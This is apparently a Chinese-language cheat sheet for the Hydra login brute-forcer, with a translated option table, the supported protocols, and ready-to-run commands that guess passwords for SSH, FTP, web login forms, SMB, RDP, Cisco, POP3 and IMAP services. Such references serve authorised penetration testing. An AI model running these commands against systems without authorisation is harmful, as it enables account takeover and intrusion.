示例
hydra -l 用戶名 -P 密碼字典 ftp://192.168.0.1
hydra -L 用戶字典 -p 密碼 imap://192.168.0.1/PLAIN
hydra -C 用戶名密碼字典 -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l 用戶名 -p密碼 ftp://[192.168.0.0/24]/
hydra -L 用戶字典 -P 密碼字典 -M 目標字典 ssh
參數說明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
| 參數 | 說明 |
|---|---|
| -R | 恢復先前中止/崩潰的會話 |
| -I | 忽略現有還原文件(不要等待10秒) |
| -S | 執行SSL連接 |
| -s PORT | 如果服務在其他默認端口上,請在此處定義它 |
| -l LOGIN or -L FILE | 使用登錄名登錄,或從文件加載多個登錄名 |
| -p PASS or -P FILE | 嘗試密碼傳遞,或從文件加載多個密碼 |
| -x MIN:MAX:CHARSET | 密碼暴力強制生成,鍵入“-x-h”以獲取幫助 |
| -y | 禁用bruteforce中的符號使用,見上文 |
| -e nsr | 嘗試“n”空密碼、“s”作為pass登錄和/或“r”反向登錄 |
| -u | 循環用戶,而不是密碼(有效!x-隱含) |
| -C FILE | 冒號分隔“login:pass”格式,而不是-L/-P選項 |
| -M FILE | 要攻擊的服務器列表,每行一個條目,“:”指定端口 |
| -o FILE | 將找到的登錄/密碼對寫入文件而不是stdout |
| -b FORMAT | 指定-o文件的格式:text(默認)、json、jsonv1 |
| -f / -F | 找到登錄/通過對時退出(-M:-f每個主機,-f全局) |
| -t TASKS | 運行任務每個目標並行連接數(默認值:16) |
| -T TASKS | 整體並行運行任務連接(對於-M,默認值為64) |
| -w / -W TIME | 每個線程的連接之間的響應(32)/等待時間(0) |
| -c TIME | 所有線程上每次登錄嘗試的等待時間(強制執行-t1) |
| -4 / -6 | 使用IPv4(默認)/IPv6地址(始終放在[]中,也在-M中) |
| -v / -V / -d | 詳細模式/顯示登錄名+每次嘗試通過/調試模式 |
| -O | 使用舊的SSL v2和v3 |
| -q | 不打印有關連接錯誤的消息 |
| -U | 服務模塊使用詳細信息 |
| -h | 更多命令行選項(完整幫助) |
| server | 目標:DNS、IP或192.168.0.0/24(此選項或-M選項) |
| service | 要破解的服務(有關支持的協議,請參見下文) |
| OPT | 某些服務模塊支持附加輸入(-U表示模塊幫助) |
支持的服務
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
各種用法實例
1、破解ssh:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3、get方式提交,破解web登錄:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登錄:
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中 的內容是表示錯誤猜解的返回信息提示。)
5、破解https:
hydra -l \<用戶> -p \<密碼> \<IP地址> <頭部信息> "\<登錄頁面>:\<請求正文>:\<錯誤消息>"
示例:
hydra -V -l admin -P /root/pass.txt 192.168.80.128 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
6、破解teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
